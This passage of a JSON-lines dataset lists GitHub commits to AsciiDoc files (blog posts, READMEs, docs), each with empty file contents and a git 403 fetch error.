search,jango2015\/elasticsearch,Rygbee\/elasticsearch,sposam\/elasticsearch,masaruh\/elasticsearch,sarwarbhuiyan\/elasticsearch,rmuir\/elasticsearch,lmtwga\/elasticsearch,gmarz\/elasticsearch,MjAbuz\/elasticsearch,springning\/elasticsearch,knight1128\/elasticsearch,lightslife\/elasticsearch,mcku\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,sc0ttkclark\/elasticsearch,Chhunlong\/elasticsearch,acchen97\/elasticsearch,infusionsoft\/elasticsearch,tebriel\/elasticsearch,yynil\/elasticsearch,kunallimaye\/elasticsearch,nellicus\/elasticsearch,Charlesdong\/elasticsearch,Fsero\/elasticsearch,LeoYao\/elasticsearch,zhiqinghuang\/elasticsearch,brandonkearby\/elasticsearch,humandb\/elasticsearch,hafkensite\/elasticsearch,MetSystem\/elasticsearch,kubum\/elasticsearch,fforbeck\/elasticsearch,ckclark\/elasticsearch,tebriel\/elasticsearch,Chhunlong\/elasticsearch,TonyChai24\/ESSource,iacdingping\/elasticsearch,jchampion\/elasticsearch,kimimj\/elasticsearch,artnowo\/elasticsearch,artnowo\/elasticsearch,jbertouch\/elasticsearch,wuranbo\/elasticsearch,strapdata\/elassandra-test,dylan8902\/elasticsearch,markharwood\/elasticsearch,bestwpw\/elasticsearch,hanswang\/elasticsearch,pritishppai\/elasticsearch,TonyChai24\/ESSource,queirozfcom\/elasticsearch,hanswang\/elasticsearch,jchampion\/elasticsearch,cwurm\/elasticsearch,infusionsoft\/elasticsearch,jeteve\/elasticsearch,queirozfcom\/elasticsearch,weipinghe\/elasticsearch,kalburgimanjunath\/elasticsearch,ricardocerq\/elasticsearch,yuy168\/elasticsearch,mgalushka\/elasticsearch,mgalushka\/elasticsearch,JSCooke\/elasticsearch,mmaracic\/elasticsearch,Uiho\/elasticsearch,awislowski\/elasticsearch,himanshuag\/elasticsearch,Fsero\/elasticsearch,iamjakob\/elasticsearch,ricardocerq\/elasticsearch,rento19962\/elasticsearch,Charlesdong\/elasticsearch,snikch\/elasticsearch,nellicus\/elasticsearch,Chhunlong\/elasticsearch,zhiqinghuang\/elasticsearch,mikemccand\/elasticsearch,vietlq\/elasticsearch,yuy168\/elasticsearch,njlawton\/elasticsearch,mikemccand\/elasticsearch,fekaputra\/elasticsearch,umeshdangat\/elasticsearch,rlugojr\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mmaracic\/elasticsearch,jpountz\/elasticsearch,Charlesdong\/elasticsearch,knight1128\/elasticsearch,xingguang2013\/elasticsearch,markharwood\/elasticsearch,strapdata\/elassandra-test,bawse\/elasticsearch,shreejay\/elasticsearch,Siddartha07\/elasticsearch,likaiwalkman\/elasticsearch,TonyChai24\/ESSource,xingguang2013\/elasticsearch,zeroctu\/elasticsearch,palecur\/elasticsearch,Collaborne\/elasticsearch,jango2015\/elasticsearch,achow\/elasticsearch,onegambler\/elasticsearch,gmarz\/elasticsearch,yanjunh\/elasticsearch,Siddartha07\/elasticsearch,wbowling\/elasticsearch,btiernay\/elasticsearch,kubum\/elasticsearch,iamjakob\/elasticsearch,jpountz\/elasticsearch,elasticdog\/elasticsearch,MaineC\/elasticsearch,davidvgalbraith\/elasticsearch,iacdingping\/elasticsearch,Uiho\/elasticsearch,palecur\/elasticsearch,jango2015\/elasticsearch,jimczi\/elasticsearch,zkidkid\/elasticsearch,adrianbk\/elasticsearch,lmtwga\/elasticsearch,Shekharrajak\/elasticsearch,iamjakob\/elasticsearch,EasonYi\/elasticsearch,slavau\/elasticsearch,spiegela\/elasticsearch,elancom\/elasticsearch,awislowski\/elasticsearch,JervyShi\/elasticsearch,lydonchandra\/elasticsearch,gfyoung\/elasticsearch,andrejserafim\/elasticsearch,achow\/elasticsearch,fred84\/elasticsearch,xuzha\/elasticsearch,liweinan0423\/elasticsearch,mjhennig\/elasticsearch,camilojd\/elasticsearch,GlenRSmith\/elasticsearch,StefanGor\/elasticsearch,vingupta3\/elasticsearch,lzo\/elasticsearch-1,masterweb121\/elasticsearch,clintongormley\/elasticsearch,ouyangkongtong\/elasticsearch,mcku\/elasticsearch,Widen\/elasticsearch,NBSW\/elasticsearch,queirozfcom\/elasticsearch,TonyChai24\/ESSource,naveenhooda2000\/elasticsearch,apepper\/elasticsearch,andrestc\/elasticsearch,dylan8902\/elasticsearch,C-Bish\/elasticsearch,martinstuga\/elasticsearch,nellicus\/elasticsearch,luiseduardohdbackup\/elasticsearch,ouyangkongtong\/elasticsearch,nrkkalyan\/elasticsearch,Fsero\/elasticsearch,schonfeld\/elasticsearch,wbowling\/elasticsearch,masterweb121\/elasticsearch,wayeast\/elasticsearch,ZTE-PaaS\/elasticsearch,bestwpw\/elasticsearch,markllama\/elasticsearch,yongminxia\/elasticsearch,fernandozhu\/elasticsearch,tebriel\/elasticsearch,kubum\/elasticsearch,jeteve\/elasticsearch,TonyChai24\/ESSource,strapdata\/elassandra,vietlq\/elasticsearch,kunallimaye\/elasticsearch,NBSW\/elasticsearch,andrejserafim\/elasticsearch,xingguang2013\/elasticsearch,kingaj\/elasticsearch,ESamir\/elasticsearch,jbertouch\/elasticsearch,mapr\/elasticsearch,lchennup\/elasticsearch,ouyangkongtong\/elasticsearch,winstonewert\/elasticsearch,Liziyao\/elasticsearch","old_file":"docs\/reference\/modules\/plugins.asciidoc","new_file":"docs\/reference\/modules\/plugins.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f8cab98795b0c96905bed2ce4683d56ccd215c2c","subject":"First pass at a CONTRIBUTING.adoc file","message":"First pass at a CONTRIBUTING.adoc file\n","repos":"Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Unidata\/netcdf-java.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"5c3a84a09769d16e9b50092ff0562a94064548ac","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57eabed0aa5895c3147b8bcc2ed50b5501072d66","subject":"add initial support doc","message":"add initial support doc\n","repos":"CrunchyData\/crunchy-containers,the1forte\/crunchy-containers,the1forte\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers,the1forte\/crunchy-containers","old_file":"docs\/dedicated-support.adoc","new_file":"docs\/dedicated-support.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/the1forte\/crunchy-containers.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a08320891b0238d92e6dc1cae263a0d0c510546a","subject":"Update 2016-06-19-Release-automation.adoc","message":"Update 2016-06-19-Release-automation.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2016-06-19-Release-automation.adoc","new_file":"_posts\/2016-06-19-Release-automation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9d914306539a442ab3e5215ee769dc1b3678fce","subject":"Update 2017-08-07-Fun-With-Asteroids.adoc","message":"Update 2017-08-07-Fun-With-Asteroids.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-08-07-Fun-With-Asteroids.adoc","new_file":"_posts\/2017-08-07-Fun-With-Asteroids.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa66dbba74ec7bb05c375651070febd7198f24dd","subject":"Update 2018-07-06-Rust-Magical-girls.adoc","message":"Update 2018-07-06-Rust-Magical-girls.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2018-07-06-Rust-Magical-girls.adoc","new_file":"_posts\/2018-07-06-Rust-Magical-girls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18a7680b8360a7ce2d008565cbcb9e6aa79b0cac","subject":"Update 2018-10-15-N-E-M-A-P-I-Docker.adoc","message":"Update 2018-10-15-N-E-M-A-P-I-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-N-E-M-A-P-I-Docker.adoc","new_file":"_posts\/2018-10-15-N-E-M-A-P-I-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79a9e7fed123706ca0b9542598a20b5d1f890c7d","subject":"Updated concepts.asciidoc","message":"Updated concepts.asciidoc\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/concepts\/concepts.asciidoc","new_file":"asciidoc\/concepts\/concepts.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2f09d48bc1ddc67d0caf10eb7154f301aeb422c9","subject":"y2b create post Futuristic Police Car -- Loaded With Tech (CES 2013)","message":"y2b create post Futuristic Police Car -- Loaded With Tech (CES 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-10-Futuristic-Police-Car--Loaded-With-Tech-CES-2013.adoc","new_file":"_posts\/2013-01-10-Futuristic-Police-Car--Loaded-With-Tech-CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac5df31191ad82b71634b46b55057555915d8f7e","subject":"Update 2016-12-01-Exploit-sur-Tor.adoc","message":"Update 2016-12-01-Exploit-sur-Tor.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Exploit-sur-Tor.adoc","new_file":"_posts\/2016-12-01-Exploit-sur-Tor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38ecd42ec87e8f8cebd9a49c90bc2fb793ba092b","subject":"Update 2015-05-10-CSS-Introduction.adoc","message":"Update 2015-05-10-CSS-Introduction.adoc","repos":"rh0\/the-myriad-path,rh0\/the-myriad-path,rh0\/the-myriad-path","old_file":"_posts\/2015-05-10-CSS-Introduction.adoc","new_file":"_posts\/2015-05-10-CSS-Introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rh0\/the-myriad-path.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71ad4f5e43b3bcc44770e37413f0369dd9502d26","subject":"Update 2017-02-24-Google-Extension.adoc","message":"Update 2017-02-24-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extension.adoc","new_file":"_posts\/2017-02-24-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73f4ec40a5e76b572ae72c2c743073b14ba7259a","subject":"Update 2015-02-11-Second-post.adoc","message":"Update 2015-02-11-Second-post.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-11-Second-post.adoc","new_file":"_posts\/2015-02-11-Second-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ac4d264f185463b7093f71fcda1e4a2d88cd1e9","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c47a0e54a83c17e098dae830028dd8fb81cc3bb","subject":"add guide on native executables","message":"add guide on native executables\n","repos":"clojure\/clojurescript-site","old_file":"content\/guides\/native-executables.adoc","new_file":"content\/guides\/native-executables.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8f8a40ee828565bddc7e8caefe2f3fb3b7df1a18","subject":"Update readme.adoc","message":"Update readme.adoc\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/readme.adoc","new_file":"docs\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81905b4fc7190acda742065b680d40e098d2628f","subject":"Create 030-tensor-operations.asciidoc","message":"Create 030-tensor-operations.asciidoc","repos":"tensorics\/tensorics-core","old_file":"src\/asciidoc\/030-tensor-operations.asciidoc","new_file":"src\/asciidoc\/030-tensor-operations.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tensorics\/tensorics-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ae16e7ecd2b0b5b6e9401ff4425d25a25eaa45b5","subject":"Publish 2016-12-1-There-was-a-keynote-lecture.adoc","message":"Publish 2016-12-1-There-was-a-keynote-lecture.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-1-There-was-a-keynote-lecture.adoc","new_file":"2016-12-1-There-was-a-keynote-lecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"598f3e861aa673277d4873c8722c6e36309b41ad","subject":"add new post","message":"add new post\n","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2019-04-07-IPSec S2S - From Azure Stack to Mikrotik.adoc","new_file":"_posts\/2019-04-07-IPSec S2S - From Azure Stack to Mikrotik.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be51eb58cc20ef5d9d9a222c111101d521b230d7","subject":"[DOC] Fix es-hadoop version","message":"[DOC] Fix es-hadoop version\n","repos":"aie108\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,sarwarbhuiyan\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,puneetjaiswal\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop,huangll\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,jasontedor\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/huangll\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a049839798e44f973a28b11d83b756e7a9d754e4","subject":"links S1","message":"links S1\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ffa0860f3e959b07ba70015d8801a7c3974f49c","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e898d0d5a9ccef562ff3ff900abfb3fa5d7545c","subject":"Update 2015-03-24-ACE-Editor-Custom-Mode.adoc","message":"Update 2015-03-24-ACE-Editor-Custom-Mode.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2015-03-24-ACE-Editor-Custom-Mode.adoc","new_file":"_posts\/2015-03-24-ACE-Editor-Custom-Mode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbc58fe620bc97f8e50d70cb38f76813b1ea4f8a","subject":"Update 2017-12-01-IBM-Learning-Resources.adoc","message":"Update 2017-12-01-IBM-Learning-Resources.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-12-01-IBM-Learning-Resources.adoc","new_file":"_posts\/2017-12-01-IBM-Learning-Resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ef74a461f0b6a209921df57a6cfa58b2abf83bd","subject":"Update 2013-11-16-Episode-2-Happy-Hour.adoc","message":"Update 2013-11-16-Episode-2-Happy-Hour.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2013-11-16-Episode-2-Happy-Hour.adoc","new_file":"_posts\/2013-11-16-Episode-2-Happy-Hour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76ba36d5604dce69b558905ef572e2280e1c4666","subject":"Update 2017-09-06-FW4SPL-1200-released.adoc","message":"Update 2017-09-06-FW4SPL-1200-released.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2017-09-06-FW4SPL-1200-released.adoc","new_file":"_posts\/2017-09-06-FW4SPL-1200-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e384fb96c5ce44a33449e6ee5047cebe0b8a8bd6","subject":"fix: \u5909\u306a\u7a7a\u767d\u3068\u30ea\u30f3\u30af\u5bfe\u5fdc","message":"fix: \u5909\u306a\u7a7a\u767d\u3068\u30ea\u30f3\u30af\u5bfe\u5fdc\n","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c30ca155350ba510eca83f866983e57c62588d2","subject":"Add README.adoc with the initial documentation.","message":"Add README.adoc with the initial documentation.\n","repos":"funcool\/potok","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/funcool\/potok.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"79aa9f0ced73ee46958e202944963064a018d9be","subject":"document use of Gradle proxy settings","message":"document use of Gradle proxy settings\n","repos":"getreu\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/getreu\/asciidoctor-fopub.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e54d4bbd9d605d89fb3bc7575d5d4f2057b2e878","subject":"Added Alchemists style guide badge","message":"Added Alchemists style guide badge\n\nNecessary to identify what style guide is used for the project.\n","repos":"bkuhlmann\/tokener,bkuhlmann\/tokener,bkuhlmann\/tokener","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/tokener.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fe09cc16dc040855719567124114bd85f8848728","subject":"README","message":"README\n","repos":"dataprev\/kanboard-import-gitlab","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dataprev\/kanboard-import-gitlab.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f586fcdd3916fd8736b8dcb66a338ecb8d92dc7","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"340115319c84c3c8ab6e90593af39110dcdbe431","subject":"Common Google App Engine Flexible","message":"Common Google App Engine Flexible\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-googleappengine.adoc","new_file":"src\/main\/docs\/common-googleappengine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"06fb1b9271fff3a4a9f8b63d0a892284f6d570a1","subject":"First draft of typing spec","message":"First draft of typing spec\n","repos":"teozkr\/GearScript,teozkr\/GearScript","old_file":"Design\/Typing.adoc","new_file":"Design\/Typing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/teozkr\/GearScript.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af242ec53968eab5391a50a332f5951b2a823fc9","subject":"Update 2016-01-26-Test.adoc","message":"Update 2016-01-26-Test.adoc","repos":"inedit-reporter\/inedit-reporter.github.io,inedit-reporter\/inedit-reporter.github.io,inedit-reporter\/inedit-reporter.github.io","old_file":"_posts\/2016-01-26-Test.adoc","new_file":"_posts\/2016-01-26-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/inedit-reporter\/inedit-reporter.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88b1f5ad7b6e2b2ec0eba993bc2d4cd44b028682","subject":"Publish 3000-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","message":"Publish 3000-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"3000-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","new_file":"3000-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae740a0328a09091e81a3e548155be195425e3bc","subject":"Update 2016-03-30-Subiendo-el-exploit.adoc","message":"Update 2016-03-30-Subiendo-el-exploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4079ffe424e38674389e1591ffb1dcfb56b0b92e","subject":"Update 2017-02-17-First-Hubpress-Blog.adoc","message":"Update 2017-02-17-First-Hubpress-Blog.adoc","repos":"harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io","old_file":"_posts\/2017-02-17-First-Hubpress-Blog.adoc","new_file":"_posts\/2017-02-17-First-Hubpress-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harvard-visionlab\/harvard-visionlab.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74cc586967088d66c71413643e6f46982afcdc26","subject":"Update 2017-04-09-Incontri-nei-boschi.adoc","message":"Update 2017-04-09-Incontri-nei-boschi.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-09-Incontri-nei-boschi.adoc","new_file":"_posts\/2017-04-09-Incontri-nei-boschi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d8f0f426b102612f1e4e78892a0f5b94e6285d5","subject":"Update 